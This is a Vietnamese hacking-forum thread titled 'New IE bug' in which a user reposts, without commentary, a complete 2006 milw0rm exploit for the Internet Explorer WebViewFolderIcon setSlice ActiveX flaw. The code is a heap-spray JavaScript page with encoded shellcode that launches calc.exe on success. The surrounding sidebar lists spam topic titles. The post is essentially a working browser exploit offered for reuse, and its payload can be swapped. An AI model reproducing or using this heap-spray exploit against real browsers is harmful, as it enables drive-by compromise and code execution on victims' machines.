HVAonline
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

HVAonline

Security, Designing, Hacking, Programming
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập
Tìm kiếm
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Xác định định dạng dữ liệu
Bug mới của IE I_icon_minitimeFri Jul 10, 2015 7:02 pm by tran quang huy

» Compra Viagra. viagra generico catalogo
Bug mới của IE I_icon_minitimeThu Aug 04, 2011 1:25 pm by Khách viếng thăm

» Compra Viagra. viagra generico all estero
Bug mới của IE I_icon_minitimeThu Aug 04, 2011 11:55 am by Khách viếng thăm

» real time gaming online casinos
Bug mới của IE I_icon_minitimeWed Aug 03, 2011 8:11 pm by Khách viếng thăm

» Why wont my phone lt me use GIF images?
Bug mới của IE I_icon_minitimeWed Aug 03, 2011 7:34 pm by Khách viếng thăm

» fish oil dietary supplement
Bug mới của IE I_icon_minitimeWed Aug 03, 2011 9:44 am by Khách viếng thăm

» How do i turn on cookies on .my headset?
Bug mới của IE I_icon_minitimeTue Aug 02, 2011 10:25 pm by Khách viếng thăm

» гинекология грибы
Bug mới của IE I_icon_minitimeMon Aug 01, 2011 10:33 pm by Khách viếng thăm

» backlink popularity backlink services
Bug mới của IE I_icon_minitimeMon Aug 01, 2011 3:34 pm by Khách viếng thăm

Top posters
conmale
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
quanta
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
seamoun
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
mrro
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
quanlytruong
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
mulan
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
TranVanMinh
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
Z0rr0
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
zeno
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
WinDak
Bug mới của IE EmptyBug mới của IE I_voting_barBug mới của IE Empty 
Thống Kê
Hiện có 1 người đang truy cập Diễn Đàn, gồm: 0 Thành viên, 0 Thành viên ẩn danh và 1 Khách viếng thăm

Không

Số người truy cập cùng lúc nhiều nhất là 64 người, vào ngày Sun Oct 13, 2024 2:44 am

 

 Bug mới của IE

Go down 
Tác giảThông điệp
zeno

zeno


Tổng số bài gửi : 5
Join date : 18/10/2010

Bug mới của IE Empty
Bài gửiTiêu đề: Bug mới của IE   Bug mới của IE I_icon_minitimeMon Oct 18, 2010 8:59 pm

Code:
<!--
 
 ..::[ jamikazu presents ]::..
 
 Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
 Works on all Windows XP versions including SP2
 
 Author: jamikazu
 Mail: <a href="mailto:jamikazu@gmail.com">jamikazu@gmail.com</a>
 
 Bug discovered by Computer H D Moore (http://www.metasploit.com)
 
 Credit: metasploit, SkyLined
 
 invokes calc.exe if successful
 
 -->
 
 <HTML>
 <BODY>
 <SCRIPT language="javascript">
 
    var heapSprayToAddress = 0x05050505;
    var payLoadCode = unescape(
    "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
    "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
    "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
    "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
    "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
    "%uFF57%u63E7%u6C61%u0063");
    var heapBlockSize = 0x400000;
    var payLoadSize = payLoadCode.length * 2;
    var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
    var spraySlide = unescape("%u0505%u0505");
    spraySlide = getSpraySlide(spraySlide,spraySlideSize);
    heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
    memory = new Array();
 
    for (i=0;i<heapBlocks;i++)
    {
       memory[i] = spraySlide + payLoadCode;
    }
 
       for ( i = 0 ; i < 128 ; i++)
    {
       try{
          var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
          tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
       }catch(e){}
    }
 
    function getSpraySlide(spraySlide, spraySlideSize)
    {
       while (spraySlide.length*2<spraySlideSize)
       {
          spraySlide += spraySlide;
       }
       spraySlide = spraySlide.substring(0,spraySlideSize/2);
       return spraySlide;
    }
 
 </SCRIPT>
 
 </BODY>
 </HTML>
 
 # milw0rm.com [2006-09-28]
Về Đầu Trang Go down
https://hvaonline.forumvi.net/
 
Bug mới của IE
Về Đầu Trang 
Trang 1 trong tổng số 1 trang

Permissions in this forum:Bạn không có quyền trả lời bài viết
HVAonline :: Bảo mật và thâm nhập :: Thông tin new bugs và exploits-
Chuyển đến